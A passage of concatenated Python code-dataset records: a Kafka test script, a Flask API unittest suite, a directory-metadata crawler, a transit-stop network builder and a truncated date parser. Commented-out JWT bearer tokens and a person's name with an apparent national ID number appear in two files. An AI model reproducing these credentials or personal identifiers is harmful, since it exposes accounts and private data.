torch.from_numpy(kek)\n        return img,labels\n    def __len__(self):\n        return len(self.imlabs)\n","sub_path":"pytorch/data_class.py","file_name":"data_class.py","file_ext":"py","file_size_in_byte":6326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}\n{"seq_id":"476566280","text":"from pykafka import KafkaClient\nfrom pykafka.common import OffsetType\n\nfrom common import settings\n\nquery_params = '{\"attributeMap\":{\"company\":{\"companyName\":\"河南省远创生物科技有限公司\",\"licenceNo\":\"68633903-2\"}},\"header\":{\"callWay\":1,\"orderId\":\"test_200008\"},\"probePubKey\":\"1b8334ced32a4b60ad0a8914de1bc65d\",\"proxyRank\":1}'\n# query_params = '{\"attributeMap\":{\"personal\":{\"name\":\"刘衍洪\",\"idCardNo\":\"51102519681122141X\"}},\"header\":{\"callWay\":1,\"orderId\":\"test_10000\"},\"probePubKey\":\"91135ebe9bec4526be7706abc0c47789\",\"proxyRank\":1}'\n\nclient = KafkaClient(\n    hosts=settings.KAFKA_HOST,\n    zookeeper_hosts=settings.ZOOKEEPER_HOST,\n)\n\n\ndef start(topic, consume=False, produce=False):\n    kafka_producer = client.topics[topic].get_sync_producer(\n        max_request_size=1024 * 1024 * 1,\n    )\n\n    kafka_consumer = client.topics[settings.ASY_PREFIX + topic].get_simple_consumer(\n        consumer_group=settings.KAFKA_GROUP,\n        fetch_message_max_bytes=1024 * 1024 * 1,\n        auto_commit_enable=False,\n        auto_offset_reset=OffsetType.EARLIEST,\n        reset_offset_on_start=False,\n        consumer_id=settings.KAFKA_GROUP_ID\n    )\n\n    if consume:\n        for item in kafka_consumer:\n            msg = item.value\n            offset = item.offset\n            
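# note: commit_offsets() below runs once per consumed message; batching commits every N messages is a common, cheaper pattern\n            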
print(offset, msg)\n kafka_consumer.commit_offsets()\n\n if produce:\n kafka_producer.produce(query_params.encode('utf-8'))\n\n\nif __name__ == '__main__':\n start(settings.ASY_01_SHIXIN_COMPANY, consume=True)\n # start(config.ASY_01_SHIXIN_COMPANY, produce=True)\n","sub_path":"script_asy.py","file_name":"script_asy.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"237726677","text":"import os\nimport unittest\nimport json\nfrom flask_sqlalchemy import SQLAlchemy\nimport sys\n\nfrom app import create_app\nfrom models import setup_db, Actor, Movie, drop_and_create_all\nfrom datetime import date\nfrom config import TOKENS\n# CASTING_ASSISTANT_AUTH_HEADER = {\n# 'Authorization': \"Bearer eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6IjNidUcxblJ4VzhDVFNPYkMyanJHZiJ9.eyJpc3MiOiJodHRwczovL2plZmZyZXlmc25kLmF1dGgwLmNvbS8iLCJzdWIiOiJhdXRoMHw1ZjIyY2VjZjU4ZTI4NjAwMzcyZjU3ZjYiLCJhdWQiOiJjYXN0aW5nX2FnZW5jeSIsImlhdCI6MTU5NjExNjgxNSwiZXhwIjoxNTk2MjAzMjE0LCJhenAiOiJ1UXZNNDVPNkZmNGpxWm1GbzhiZ1hCckRKUG5KUDVkayIsInNjb3BlIjoiIiwicGVybWlzc2lvbnMiOlsiZ2V0OmFjdG9ycyIsImdldDptb3ZpZXMiXX0.dWuG5mhBpOMNUFXDfx2BwHANEuBsT0RpeOBELfsTlfWPLjPUiiqkadvcl34RNowTnkwxkQT4jqn4B0Cl-wM8tW9ZU2D1NMrsY74j10551FhAtz3BCbYOgZuswEn3KzN-VNhoDRua6xUyUNoSZXJQ92fOMNKa0afCKeSxj4VO6G2D3jQYSMEt28RCXFYjAPiNAO4D63RLqdfqY5a7tfSfq5OlaUZdYFV8vUBV3FxsiSBOO9F2D5wA2wE7_6NmPNS_qcWIsgA1gt4J3_4DwUwyLQUG0frYhPz4gaSGsTYJuWfXg1fyVXJMQvQnTYsdwn3AhjVb7VNxqUut1PtsetwssA\"\n# }\n# CASTING_DIRECTOR_AUTH_HEADER = {\n# 'Authorization': \"Bearer eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6IjNidUcxblJ4VzhDVFNPYkMyanJHZiJ9.eyJpc3MiOiJodHRwczovL2plZmZyZXlmc25kLmF1dGgwLmNvbS8iLCJzdWIiOiJhdXRoMHw1ZWUwOTIwNWYyYTc4MzAwMTk2MTEyZTEiLCJhdWQiOiJjYXN0aW5nX2FnZW5jeSIsImlhdCI6MTU5NjExNjU1NCwiZXhwIjoxNTk2MjAyOTUzLCJhenAiOiJ1UXZNNDVPNkZmNGpxWm1GbzhiZ1hCckRKUG5KUDVkayIsInNjb3BlIjoiIiwicGVybWlzc2lvbnMiOlsiZGVsZXRlOmFjdG9ycyIsImdldDphY3RvcnMiLCJnZXQ6bW92aWVzIiwicGF0Y2g6YWN0b3JzIiwicGF0Y2g6bW92aWVzIiwicG9zdDphY3RvcnMiXX0.s5unjMh1FER-73M3rQX0HE-ERkZuTSMfPfOKMnEreHqAGN2kd1miVwXLn2ezlCconYWbpdAmLRHn-J4STkLGer_DWDN9hImpYQ-NUZu-dGr8leHo7IVgK5vOhqUZQZ6bGPq1WEcwUS5m2OvIOQb50b6oyajfMAcmq-LfoB0P6z8zRY15lCBiacAZXidS2Kh40b0VkXMjDwcya7OugLEdtLVtfAda7JKle4_zAvjGFVLLS0qtRO5MRefUVXWUHzGVUbBE_-MCAjKJSur8I-06Zu6n4TI85ulViCpfS65mb-mTlcn7kM-XKxg8Tf7jS5Zfx5efkSRxDv2q_LKiaMc6Kg\"\n# }\n# EXECUTIVE_PRODUCER_AUTH_HEADER = {\n# 'Authorization': \"Bearer eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6IjNidUcxblJ4VzhDVFNPYkMyanJHZiJ9.eyJpc3MiOiJodHRwczovL2plZmZyZXlmc25kLmF1dGgwLmNvbS8iLCJzdWIiOiJhdXRoMHw1ZWRiNDJkZTIyOWRjZTAwMTNkNTYzMTYiLCJhdWQiOiJjYXN0aW5nX2FnZW5jeSIsImlhdCI6MTU5NjExNjI1NCwiZXhwIjoxNTk2MjAyNjUzLCJhenAiOiJ1UXZNNDVPNkZmNGpxWm1GbzhiZ1hCckRKUG5KUDVkayIsInNjb3BlIjoiIiwicGVybWlzc2lvbnMiOlsiZGVsZXRlOmFjdG9ycyIsImRlbGV0ZTptb3ZpZXMiLCJnZXQ6YWN0b3JzIiwiZ2V0Om1vdmllcyIsInBhdGNoOmFjdG9ycyIsInBhdGNoOm1vdmllcyIsInBvc3Q6YWN0b3JzIiwicG9zdDptb3ZpZXMiXX0.j9S9QCzIRAxYfPJycXJarYTwnhWCib9apJT5PS8aFotFUmZ8VSS5kh-_zMCwUf86jhpP5_Jg1b6IdkQyYAB9lp8IIBBW-HiHQfNMgR3WF6qE2wHHhvk-lUqY-Squjf_e9vOV1J90XuNwUOFTAjackTpi-CGiJVpeGtSoDpo5gn9QZOsBhHxO3e8QRRGPYIRJ-5mVXIm8yjlihe9CWv1VaEtddmxycIizWSI9lfgU8mTdwXzkeab6_gUhCbFS8j0nu8xUR0OcoHGR_WX2wjPaoeMgL3uhTo5cRhlWCey8PsV-FakDDs9ZPgxfEFv2nKngQNnvKYOvUWHpbib1Lr1EGw\"\n# }\nCASTING_ASSISTANT_AUTH_HEADER = {\n 'Authorization': TOKENS['CASTING_ASSISTANT']\n}\nCASTING_DIRECTOR_AUTH_HEADER = {\n 'Authorization': TOKENS['CASTING_DIRECTOR']\n}\nEXECUTIVE_PRODUCER_AUTH_HEADER = {\n 'Authorization': 
TOKENS['EXECUTIVE_PRODUCER']\n}\n\n\nclass CastAgencyTestCase(unittest.TestCase):\n def setUp(self):\n \"\"\"Define test variables and initialize app.\"\"\"\n self.app = create_app()\n self.client = self.app.test_client\n self.database_name = \"cast_agency_test\"\n # self.database_path = \"postgres://{}/{}\".format('localhost:5432', self.database_name)\n self.database_path = 'postgresql:///cast_agency_test'\n setup_db(self.app, self.database_path)\n drop_and_create_all()\n\n # binds the app to the current context\n with self.app.app_context():\n self.db = SQLAlchemy()\n self.db.init_app(self.app)\n # create all tables\n self.db.create_all()\n \n def tearDown(self):\n \"\"\"Executed after reach test\"\"\"\n pass\n\n \n # Actors\n '''\n Get actors\n '''\n def test_get_actors(self):\n '''\n normal operation of getting actors\n '''\n res = self.client().get('/actors', headers=CASTING_ASSISTANT_AUTH_HEADER)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['actors'])\n self.assertTrue(data['total_actors'])\n\n def test_get_actors_not_found(self):\n '''\n no actors in the page\n '''\n res = self.client().get('/actors?page=12000000', headers=CASTING_ASSISTANT_AUTH_HEADER)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['error'], 404)\n self.assertEqual(data['message'], 'not found')\n\n def test_get_actors_no_authorization(self):\n '''\n no permission provided at all\n '''\n res = self.client().get('/actors')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 401)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'Authorization header is expected.')\n\n '''\n create actors\n '''\n def test_create_actor(self):\n '''\n normal operation for posting actor\n '''\n new_actor = {\n 'name': 'Jeffrey',\n 'age': 20,\n 'gender': 'Male'\n }\n res = self.client().post('/actors', json=new_actor, headers=CASTING_DIRECTOR_AUTH_HEADER)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['created'])\n self.assertTrue(data['total_actors'])\n\n def test_create_in_valid_actor(self):\n '''\n no null value in the actor\n '''\n new_actor = {\n 'name': '',\n 'age': 20,\n 'gender': ''\n }\n res = self.client().post('/actors', json=new_actor, headers=CASTING_DIRECTOR_AUTH_HEADER)\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 422)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['error'], 422)\n self.assertEqual(data['message'], 'unprocessable entity')\n\n def test_create_actor_no_permission(self):\n new_actor = {\n 'name': 'Jeffrey',\n 'age': 20,\n 'gender': 'Male'\n }\n res = self.client().post('/actors', json=new_actor, headers=CASTING_ASSISTANT_AUTH_HEADER)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 403)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'Permission not found.')\n\n '''\n update actors\n '''\n def test_edit_actor(self):\n '''\n normal operation\n '''\n update_json = {\n 'age': 30\n }\n res = self.client().patch(\"/actors/1\", json=update_json, headers=CASTING_DIRECTOR_AUTH_HEADER)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['edit_actor'])\n self.assertTrue(data['total_actors'])\n\n def test_edit_actor_not_found(self):\n '''\n 
no such actor id in the db\n '''\n actor_id = 10000000\n update_json = {\n 'age': 30\n }\n res = self.client().patch(f'/actors/{actor_id}', json=update_json, headers=CASTING_DIRECTOR_AUTH_HEADER)\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['error'], 404)\n self.assertEqual(data['message'], 'not found')\n\n def test_edit_actor_no_permission(self):\n update_json = {\n 'age': 30\n }\n res = self.client().patch(\"/actors/1\", json=update_json, headers=CASTING_ASSISTANT_AUTH_HEADER)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 403)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'Permission not found.')\n\n\n '''\n Test delete actor\n '''\n def test_delete_actor(self):\n '''\n normal operation for delete\n '''\n res = self.client().delete('/actors/1', headers = CASTING_DIRECTOR_AUTH_HEADER)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertEqual(data['deleted'], 1)\n\n def test_delete_actor_no_permission(self):\n '''\n assistant can't delete actor\n '''\n res = self.client().delete('/actors/1', headers = CASTING_ASSISTANT_AUTH_HEADER)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 403)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'Permission not found.')\n\n\n def test_delete_actor_unprocessable(self):\n '''\n no such actor id in the db.\n '''\n actor_id = 100000000\n res = self.client().delete(f'/actors/{actor_id}', headers=CASTING_DIRECTOR_AUTH_HEADER)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 422)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['error'], 422)\n self.assertEqual(data['message'], 'unprocessable entity')\n\n # Movies\n '''\n Get movies\n '''\n def test_get_movies(self):\n '''\n normal operation\n '''\n res = self.client().get('/movies', headers=CASTING_ASSISTANT_AUTH_HEADER)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['movies'])\n self.assertTrue(data['total_movies'])\n\n def test_get_movies_not_found(self):\n '''\n no movies in the page\n '''\n res = self.client().get('/movies?page=123453456', headers=CASTING_ASSISTANT_AUTH_HEADER)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['error'], 404)\n self.assertEqual(data['message'], 'not found')\n\n def test_get_movies_no_authorization(self):\n '''\n no permission provided at all\n '''\n res = self.client().get('/movies')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 401)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'Authorization header is expected.')\n\n '''\n CREATE movies\n '''\n def test_create_movie(self):\n '''\n normal operation\n '''\n new_movie = {\n 'title': 'John Wick 2',\n 'release_date': '2017-2-10'\n }\n res = self.client().post('/movies', json=new_movie, headers=EXECUTIVE_PRODUCER_AUTH_HEADER)\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['created'])\n self.assertTrue(data['total_movies'])\n\n def test_create_in_valid_movie(self):\n '''\n null value in the movies. 
Can't process\n '''\n new_movie = {\n 'title': '',\n 'release_date': ''\n }\n res = self.client().post('/movies', json=new_movie, headers=EXECUTIVE_PRODUCER_AUTH_HEADER)\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 422)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['error'], 422)\n self.assertEqual(data['message'], 'unprocessable entity')\n\n def test_create_movie_no_permission(self):\n '''\n director has no permission to create movie\n '''\n new_movie = {\n 'title': 'John Wick 2',\n 'release_date': '2017-2-10'\n }\n res = self.client().post('/movies', json=new_movie, headers=CASTING_DIRECTOR_AUTH_HEADER)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 403)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'Permission not found.')\n\n def test_create_movie_no_authorization(self):\n '''\n no authorizatoin at all.\n '''\n new_movie = {\n 'title': 'John Wick 2',\n 'release_date': '2017-2-10'\n }\n res = self.client().post('/movies', json=new_movie)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 401)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'Authorization header is expected.')\n\n '''\n Edit movies\n '''\n def test_edit_movie(self):\n '''\n normal operation\n '''\n update_json = {\n 'title': 'John Wick 100'\n }\n res = self.client().patch(\"/movies/1\",json=update_json, headers=CASTING_DIRECTOR_AUTH_HEADER)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['edit_movie'])\n self.assertTrue(data['total_movies'])\n\n def test_edit_movie_unprocessable(self):\n '''\n No such movie to update\n '''\n update_json = {\n 'title': 'John Wick 100'\n }\n res = self.client().patch('/movies/1000000', json=update_json, headers=CASTING_DIRECTOR_AUTH_HEADER)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 422)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['error'], 422)\n self.assertEqual(data['message'], 'unprocessable entity')\n\n def test_edit_movie_no_permission(self):\n '''\n assistant has no right to edit the movie\n '''\n update_json = {\n 'title': 'John Wick 100'\n }\n res = self.client().patch(\"/movies/1\",json=update_json, headers=CASTING_ASSISTANT_AUTH_HEADER)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 403)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'Permission not found.')\n\n\n '''\n DElETE movies\n '''\n def test_delete_movie(self):\n '''\n normal operation\n '''\n res = self.client().delete('/movies/1', headers=EXECUTIVE_PRODUCER_AUTH_HEADER)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertEqual(data['deleted'], 1)\n\n def test_delete_movie_unprocessable(self):\n '''\n no such movie in the db\n '''\n movie_id = 100000000\n res = self.client().delete(f'/movies/{movie_id}', headers=EXECUTIVE_PRODUCER_AUTH_HEADER)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 422)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['error'], 422)\n self.assertEqual(data['message'], 'unprocessable entity')\n\n def test_delete_movie_no_permission(self):\n '''\n director has no right to delete the movie\n '''\n res = self.client().delete('/movies/1', headers=CASTING_DIRECTOR_AUTH_HEADER)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 403)\n 
self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'Permission not found.')\n\nif __name__ == '__main__':\n unittest.main()\n\n\n\n\n","sub_path":"test_app.py","file_name":"test_app.py","file_ext":"py","file_size_in_byte":15546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"112889480","text":"# coding = utf-8\n\"\"\"\ncreate on : 2019/03/02\nproject name : GetFileInfoAll\nfile name : GetFileInfoAll\n\n\"\"\"\nfrom datetime import datetime as dt\nfrom pathlib import Path\nimport time\n\nfrom tqdm import tqdm\nfrom tinydb import TinyDB\n\nTIME_FORMAT = \"%Y/%m/%d %H:%M:%S\"\n\n\ndef start_db(table_name):\n \"\"\" start up tinyDB\n\n :param table_name: database table name string\n :return: database dict\n \"\"\"\n\n # start db\n db = TinyDB(\"DirFileInfo.json\")\n\n table_name_resolve = create_normalize_path(table_name)\n # select table\n db_table = db.table(table_name_resolve)\n\n result_dict = {\"db\": db_table, \"table_name\": table_name_resolve}\n\n return result_dict\n\n\ndef create_normalize_path(org_path_str, slash=False):\n \"\"\" create normalize path string\n\n :param org_path_str: original path string\n :param slash: slash or back slash boolean\n :return: normalize path string\n \"\"\"\n\n org_path_str_replace = org_path_str.replace(\"\\\\\", \"/\")\n\n if slash:\n return org_path_str_replace\n\n normalize_path = str(Path(org_path_str_replace).resolve())\n\n return normalize_path\n\n\ndef search_dir_files(db_table, this_floor_path_list, level):\n \"\"\" search files in directory\n\n :param db_table: database table class\n :param this_floor_path_list: target directory windows path object\n :param level: dir level int\n :return: next level file and dir list\n \"\"\"\n\n def search_subdir(target_path, dir_list):\n \"\"\" search sub-directory items\n\n :param target_path: check item path windows path object\n :param dir_list: next search dir list\n :return: next dir list, item info dict\n \"\"\"\n\n target_path_str = str(target_path)\n\n error_str = \"\"\n\n try:\n if target_path.is_symlink():\n # ignore symbolic link\n pass\n\n if target_path.is_dir():\n # when dir\n target_path_type = \"dir\"\n\n target_path_stat = target_path.stat()\n last_access = dt.fromtimestamp(target_path_stat.st_atime)\n file_create = dt.fromtimestamp(target_path_stat.st_ctime)\n last_modify = dt.fromtimestamp(target_path_stat.st_mtime)\n\n file_size = 0\n\n dir_list.append(target_path)\n\n else:\n # when file\n target_path_type = \"file\"\n\n target_path_stat = target_path.stat()\n last_access = dt.fromtimestamp(target_path_stat.st_atime)\n file_create = dt.fromtimestamp(target_path_stat.st_ctime)\n last_modify = dt.fromtimestamp(target_path_stat.st_mtime)\n\n file_size = target_path_stat.st_size\n\n except Exception as error:\n replace_path_str = target_path_str.replace(\"\\\\\", \"\\\\\\\\\")\n error_str = str(error).replace(replace_path_str, \"Path strings\")\n\n target_path_type = \"error\"\n\n last_access = dt.fromtimestamp(0.0)\n file_create = dt.fromtimestamp(0.0)\n last_modify = dt.fromtimestamp(0.0)\n\n file_size = 0\n\n target_path_dict = {\"path\": target_path_str.replace(\"\\\\\", \"/\"),\n \"path_type\": target_path_type,\n \"level\": level,\n \"last_access\": last_access.strftime(TIME_FORMAT),\n \"file_create\": file_create.strftime(TIME_FORMAT),\n \"last_modify\": last_modify.strftime(TIME_FORMAT),\n \"size\": file_size}\n\n if error_str:\n target_path_dict[\"error_description\"] = error_str\n\n return dir_list, 
target_path_dict\n\n    next_floor_dir_list = []\n    target_path_dict_list = []\n\n    for this_floor_path in tqdm(this_floor_path_list):\n\n        # search all file and dirs\n        path_list = list(this_floor_path.glob(\"*\"))\n\n        for path in path_list:\n            # search file information\n            path_info_tuple = search_subdir(path, next_floor_dir_list)\n\n            next_floor_dir_list, target_dict = path_info_tuple\n\n            target_path_dict_list.append(target_dict)\n\n    db_table.insert_multiple(target_path_dict_list)\n\n    return next_floor_dir_list\n\n\ndef search_dir_file_info(search_target):\n    \"\"\" search every item on target directory\n\n    :param search_target: search start directory string\n    :return: message string\n    \"\"\"\n\n    # initialize database\n    db_dict = start_db(search_target)\n    db_table = db_dict[\"db\"]\n    search_target_normalize = db_dict[\"table_name\"]\n\n    db_table.purge()\n\n    # initialize search condition\n    next_floor_dir_list = [Path(search_target_normalize).resolve()]\n\n    total_count = target_count = level = 1\n\n    output_str = \"\\nlevel no.{no} / count:{item} / total:{total}\"\n\n    while target_count > 0:\n\n        time.sleep(1)\n\n        print(output_str.format(no=str(level).zfill(2),\n                                item=str(target_count),\n                                total=str(total_count)))\n\n        time.sleep(1)\n\n        next_floor_dir_list = search_dir_files(db_table,\n                                               next_floor_dir_list, level)\n\n        target_count = len(next_floor_dir_list)\n\n        total_count += target_count\n\n        level += 1\n\n    return \"program finished\"\n\n\ndef main():\n    drive_str = \"C:/\"\n\n    print(search_dir_file_info(drive_str))\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"GetFileInfoAll.py","file_name":"GetFileInfoAll.py","file_ext":"py","file_size_in_byte":5440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}\n{"seq_id":"520487917","text":"import time\nimport numpy as np\nimport pandas as pd\nfrom collections import defaultdict\nfrom .StopBallTree import StopBallTree\nfrom .stop import Stop\n\nglobal MAX_DISTANCE\nMAX_DISTANCE = 500\n\n\nclass Network:\n    def __init__(self, filename=\"../Data/MARTA_gtfs/all_stops.csv\"):\n        \"\"\"\n        Initialize the network object, linking every stop to the nearby stops served by other routes\n        :param filename: path to a csv of stops with cols ['stop_id', 'route_short_name', 'stop_lat', 'stop_lon']\n\n        :attributes:\n        # - stops_routes: dictionary {stop_id: routes}\n        # - stops: [Stops]\n        - stops_dict: {stop_id: Stop}\n        - stops_routes_neighbors: {stop_id: {route_id: {neighbor_stop_ids}}}\n        \"\"\"\n        cols = ['stop_id', 'route_short_name', 'stop_lat', 'stop_lon']\n        df_stops = pd.read_csv(filename)[cols].sort_values([\"route_short_name\", \"stop_id\"]).reset_index(drop=True)\n        self.df_stops = df_stops\n        groups = df_stops.groupby('stop_id')\n        self.stops_routes = {stop_id: df_routes.route_short_name.values for stop_id, df_routes in groups}\n        # print(stops_routes)\n        self.error_check(df_stops)\n        self.stops = self.make_stops(df_stops)\n        self.id_stops = {s.stop_id: s for s in self.stops}\n\n        self.stops_routes_neighbors = self.make_transitions(self.stops)\n        print(\"MADE NETWORK\")\n\n\n    def error_check(self, df_stops):\n        test1 = df_stops.drop_duplicates(subset=[\"stop_id\",\"stop_lat\",\"stop_lon\"])\n        test2 = df_stops.drop_duplicates(subset=[\"stop_id\"])\n        # test3 = df_stops.drop_duplicates(subset=[\"stop_lat\",\"stop_lon\"])\n        if len(test1) != len(test2):\n            # print(\"Error, multiple stops with same stop_id, but different lat-longs\")\n            print(\"test1\", len(test1))\n            print(\"test2\", len(test2))\n            # print(\"test3\", len(test3))\n            raise ValueError(\"Error, multiple stops with same stop_id, but different lat-longs\")\n
ValueError(\"Error, multiple stops with same stop_id, but different lat-longs\")\n # exit()\n\n # @staticmethod\n # def make_stop(stop_id, lat, lon, routes):\n # return Stop(stop_id, lat, lon, routes)\n\n def make_stops(self, df_stops):\n cols = [\"stop_id\", \"stop_lat\", \"stop_lon\"]\n temp = df_stops.drop_duplicates(subset=[\"stop_id\", \"stop_lat\", \"stop_lat\"])\n return temp[cols].apply(lambda x: Stop(x[0], x[1], x[2], self.stops_routes[x[0]]), axis=1).values\n\n def make_transitions(self, stops):\n \"\"\"\n :param stops: set or list of Stop objects \n\n :attributes: \n - ind_stops {ind: Stop}\n - ball_tree: StopBallTree(Stops) - finds neighbors within max distance\n - neighbors: [[stop_ids], [stop_ids], ...] index corresponds with ind_stop\n\n :return: dictionary of transitions for each stop {stop_id : {route_id : {neighbor_stop_ids}}}\n \"\"\"\n # print(stops)\n stops = list(stops)\n ind_stops = {ind: s.stop_id for ind, s in enumerate(stops)}\n ball_tree = StopBallTree(stops)\n neighbors_arr = ball_tree.query_radius(stops, MAX_DISTANCE)\n stops_routes_neighbors = defaultdict(lambda: defaultdict(lambda: set()))\n\n # print(neighbors_arr)\n for stop_ind, neighbors in enumerate(neighbors_arr):\n neighbors_dict = defaultdict(lambda: set()) \n for n_ind in neighbors: # neighbor id\n n_stop_id = ind_stops[n_ind] # neighbor stop id\n for route_id in self.stops_routes[n_stop_id]:\n # changing rail names to 0 for now to represent \"RAIL\"\n if route_id in [\"BLUE\", \"RED\", \"GOLD\", \"GREEN\"]:\n route_id = 0\n neighbors_dict[int(route_id)].add(int(n_stop_id))\n\n stop_id = int(ind_stops[stop_ind])\n stops_routes_neighbors[stop_id] = neighbors_dict\n\n return stops_routes_neighbors\n\n def get_transition(self, stop_id, route_id=None, ret_bool=False):\n stop_id = int(stop_id)\n if route_id is None:\n return self.stops_routes_neighbors[stop_id]\n else:\n route_id = int(route_id) # changing rail names to numbers for now\n stops = self.stops_routes_neighbors[stop_id][route_id]\n if ret_bool:\n return len(stops) > 0 # returns if the set is non-empty i.e. 
def main():\n    # filename = \"mega_stops.csv\"\n    # filename = \"/Users/anthonytrasatti/Desktop/Research/Marta/MARTA_gtfs_01_13_2018/stops.txt\"\n    # filename = \"all_stops.csv\"\n    # df_stops = pd.read_csv(filename)[cols].sort_values([\"route_short_name\",\"stop_id\"]).reset_index(drop=True)\n    network = Network(\"../../Data/MARTA_gtfs/all_stops.csv\")\n\n    # print(test1[]\n\n    print(network.df_stops.head())\n    print(network.df_stops.columns)\n    for x in network.get_transition(100004, 68): # print stops on route 68 close to stop 100004\n        print(x)\n    # print(network.neighbors)\n    # print(network.stops_routes_neighbors)\n    # stops_neighbors_dict = {int(s.stop_id):route_stop_dict(n) for s,n in list(zip(X,neighbors))[0:5]}\n    # print(stops_neighbors_dict)\n\nif __name__ == '__main__':\n    main()\n# print(count_values([len(x) for x in neighbors]))\n# test = builder_class(neighbors).build()\n# print(test)\n# test = [test.pop() for i in range(10)]\n","sub_path":"version_1_0/gtfs/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":5374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}\n{"seq_id":"653870056","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 6 16:35:29 2021\n\n@author: Caven\n\"\"\"\n\nfrom typing import List\n\n\nclass Solution:\n    def findNumbers(self, nums: List[int]) -> int:\n        count = 0\n        \n        for i in nums:\n            if len(str(i)) % 2 == 0:\n                count += 1\n        \n        return count","sub_path":"1295. Find Numbers with Even Number of Digits.py","file_name":"1295. Find Numbers with Even Number of Digits.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}\n{"seq_id":"654402728","text":"import requests, json\n\nmonths={\"january\":\"1\",\"february\":\"2\",\"march\":\"3\",\"april\":\"4\",\"may\":\"5\",\"june\":\"6\",\"july\":\"7\",\"august\":\"8\",\"september\":\"9\",\"october\":\"10\",\"november\":\"11\",\"december\":\"12\"}\n\ndef parseDate(pageText,dateType):\n    global months\n    dateString=\"error\"\n    dateStart = pageText.find(dateType)+len(dateType) #no b because case-insensitive start\n    if(dateStart-len(dateType)==-1):\n        return \"error\"\n    dateEnd = pageText.index(\"\\n\",dateStart)#will error if no newline\n    \n    dateText=pageText[dateStart:dateEnd]\n    dateStart=dateText.find(\"|\")\n    if(dateStart!=-1):#if well-formatted\n        dateStart=dateText.find(\"|\",dateStart)\n        dateEnd=dateText.find(\"|\",dateStart+1)\n        bYear=dateText[dateStart+1:dateEnd]\n        if(not bYear[0].isdigit()):\n            return \"error\"\n\n        dateStart=dateEnd\n        dateEnd=dateText.find(\"|\",dateStart+1)\n        bMonth=dateText[dateStart+1:dateEnd]\n        if(len(bMonth)<2):\n            bMonth=\"0\"+bMonth\n\n        dateStart=dateEnd+1\n        dateEnd=dateStart+2\n        bDay=dateText[dateStart:dateEnd]\n        if(not bDay[1].isdigit()):#one digit day and no leading 0\n            bDay=\"0\"+bDay[0]\n        dateString=bYear+\"-\"+bMonth+\"-\"+bDay\n    elif(dateText.find(\",\")!=-1):\n        dateStart=dateText.find(\"=\")\n        dateEnd=dateText.find(\" \",dateText.find(\",\")-3)#finds space between month and day\n        try:\n            bMonth=months[dateText[dateStart+1:dateEnd].strip().lower()]\n        except:\n            return \"error\"\n        dateStart=dateEnd+1\n        dateEnd=dateText.find(\",\")\n        bDay=dateText[dateStart:dateEnd]\n        dateStart=dateEnd+2\n        bYear=dateText[dateStart:dateStart+4]\n    else: # maybe it's just the year; fall back to parsing the last four characters for now\n
